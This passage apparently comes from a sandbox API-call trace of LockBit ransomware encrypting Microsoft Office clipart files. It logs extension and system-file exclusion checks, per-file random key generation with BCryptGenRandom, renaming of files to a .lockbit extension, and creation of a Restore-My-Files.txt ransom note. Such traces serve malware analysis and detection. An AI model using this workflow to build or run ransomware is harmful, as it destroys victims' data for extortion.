lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.526] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.526] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00095_.WMF") returned -1 [0179.526] lstrcmpiW (lpString1="ntldr", lpString2="TR00095_.WMF") returned -1 [0179.526] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00095_.WMF") returned -1 [0179.526] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00095_.WMF") returned -1 [0179.527] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00095_.WMF") returned -1 [0179.527] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00095_.WMF") returned -1 [0179.527] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00095_.WMF") returned -1 [0179.527] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.527] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF") returned=".WMF" [0179.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.527] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.527] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.528] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.528] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF.lockbit") returned 72 [0179.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00095_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.529] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.529] malloc (_Size=0x40068) returned 0x3f70048 [0179.529] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8844) returned 1 [0179.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.530] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.534] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.534] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.535] free (_Block=0x1fa2ed8) [0179.535] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.535] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.536] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba13300, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d547830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ba13300, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00097_.WMF", cAlternateFileName="")) returned 1 [0179.539] lstrcmpiW (lpString1=".", lpString2="TR00097_.WMF") returned -1 [0179.539] lstrcmpiW (lpString1="..", lpString2="TR00097_.WMF") returned -1 [0179.539] PathFindExtensionW (pszPath="TR00097_.WMF") returned=".WMF" [0179.539] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.539] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.540] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.540] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="ntldr", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00097_.WMF") returned -1 [0179.541] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00097_.WMF") returned -1 [0179.541] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.541] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF") returned=".WMF" [0179.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.541] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.541] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.542] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.542] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF.lockbit") returned 72 [0179.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00097_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0179.543] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.543] malloc (_Size=0x40068) returned 0x3e70008 [0179.543] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2556) returned 1 [0179.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0179.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0179.544] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.547] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.547] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.548] free (_Block=0x1fa2ed8) [0179.548] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.548] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.548] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98217300, ftCreationTime.dwHighDateTime=0x1bd4b14, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98217300, ftLastWriteTime.dwHighDateTime=0x1bd4b14, nFileSizeHigh=0x0, nFileSizeLow=0x25bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00116_.WMF", cAlternateFileName="")) returned 1 [0179.548] lstrcmpiW (lpString1=".", lpString2="TR00116_.WMF") returned -1 [0179.548] lstrcmpiW (lpString1="..", lpString2="TR00116_.WMF") returned -1 [0179.548] PathFindExtensionW (pszPath="TR00116_.WMF") returned=".WMF" [0179.549] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.549] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.550] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00116_.WMF") returned -1 [0179.550] lstrcmpiW (lpString1="ntldr", lpString2="TR00116_.WMF") returned -1 [0179.550] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00116_.WMF") returned -1 [0179.550] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00116_.WMF") returned -1 [0179.550] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00116_.WMF") returned -1 [0179.551] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00116_.WMF") returned -1 [0179.551] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00116_.WMF") returned -1 [0179.551] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.551] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF") returned=".WMF" [0179.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.551] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.551] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.552] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.552] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF.lockbit") returned 72 [0179.552] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF" (normalized: "c:\\program files\\microsoft 